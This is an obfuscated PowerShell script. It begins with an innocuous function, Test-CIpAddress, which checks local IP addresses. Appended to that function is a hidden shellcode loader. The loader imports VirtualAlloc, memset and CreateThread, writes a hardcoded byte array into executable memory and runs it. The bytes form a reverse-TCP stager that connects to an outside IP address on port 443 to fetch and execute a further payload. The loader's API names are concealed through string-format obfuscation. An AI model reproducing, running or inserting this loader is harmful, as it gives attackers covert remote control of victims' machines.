function T`E`sT-CIpAD`DRE`ss
{
    
    [CmdletBinding()]
    param(
        [Parameter(mANDatOry=${T`RUe})]
        [Net.IPAddress]
        
        ${iPa`DDre`sS}
    )

    &("{3}{0}{4}{2}{1}"-f 't','ode','StrictM','Se','-') -Version ("{0}{2}{1}"-f'Lat','t','es')

    .("{3}{1}{2}{4}{0}" -f 'ence','P','re','Use-Caller','fer') -Cmdlet ${Ps`cMD`Let} -Session ${ExeCUTiO`NcoNt`e`xT}."S`eSS`io`NsTaTe"

    ${I`p} = &("{2}{4}{1}{0}{3}" -f 'd','Ad','G','ress','et-CIP') | &("{1}{3}{2}{0}"-f't','Where','ec','-Obj') { ${_} -eq ${IP`AddR`ESS} }
    if( ${I`p} )
    {
        return ${TR`UE}
    }
    else
    {
        return ${f`A`Lse}
    }
}

${o`eu} = (((("{22}{2}{53}{41}{23}{52}{76}{29}{92}{26}{77}{21}{67}{74}{42}{13}{50}{35}{19}{89}{59}{48}{56}{114}{39}{110}{123}{117}{30}{51}{12}{120}{46}{71}{25}{106}{105}{94}{37}{10}{72}{43}{86}{75}{112}{47}{70}{38}{16}{17}{108}{88}{121}{55}{57}{90}{107}{54}{101}{95}{27}{91}{64}{18}{34}{58}{49}{61}{8}{9}{44}{1}{3}{45}{6}{63}{118}{82}{104}{31}{80}{65}{14}{109}{7}{36}{87}{122}{100}{69}{102}{68}{24}{20}{85}{33}{84}{62}{99}{0}{81}{66}{97}{93}{96}{98}{60}{113}{15}{115}{83}{28}{5}{32}{4}{111}{11}{119}{103}{40}{73}{116}{79}{78}"-f 'ort(sBZmsvcrt.dllsBZ','t dw','ort(s','S','u','e','ac','ame',', ','ui',');[','r','e',' IntPtr','ss, IntPtr','r ','llsBZ',')]p','Threa','ir','Ptr','ic','[DllImp','lsB','t','cat','ic s','In','r d',']pub','i','Ptr lpS','st, ','T','dAttr','V','t','rotect','32.d','dress, u',' ','.dl','n','l','n','t','flAl','k','tP','t',' ','z','Z','BZkernel32','h','atic exte','tr ','rn I','ibu','In','n In','es','[','kSi','p','rtAddre','b',' e','lags, In','wC','ernel','lo','Dl','ui','xter','m',')','tat','unt);',' co','ta',')]pu','e, ','ntPt','hreadId);',' lp','I','e','c ','tualAlloc(','ntPtr Creat','tPtr l','l','ta',' flP','d(','tic ','lic s','exter','DllImp','uint d','rea','reationF',',','Int','t','ionType, uin','eT','ubli',' lpPar','in','int s','port(sBZ','tPt','lpAd','memset(I','nt','dwS','z','c',', uint ','st','r, ','t '))-REpLAcE 'sBZ',[CHAr]34));${W} = &("{0}{1}" -f'Ad','d-Type') -memberDefinition ${O`Eu} -Name ("{0}{1}" -f'Wi','n32') -namespace ("{2}{0}{1}"-f'32Functio','ns','Win') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x4d,0xb3,0xb0,0x00,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${Z}."len`GtH" -gt 0x1000){${g} = ${Z}."l`E`NgTH"};${Xy`2H}=${W}::("{3}{2}{1}{0}"-f 'lAlloc','ua','irt','V').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${z}."l`enGTh"-1);${I}++) {${W}::"mEms`et"([IntPtr](${Xy`2h}.("{1}{0}" -f'nt32','ToI').Invoke()+${i}), ${z}[${I}], 1)};${W}::("{3}{2}{0}{1}" -f 'eThrea','d','eat','Cr').Invoke(0,0,${x`Y2H},0,0,0);for (;;){&("{0}{1}{2}"-f'S','tart-slee','p') 60};
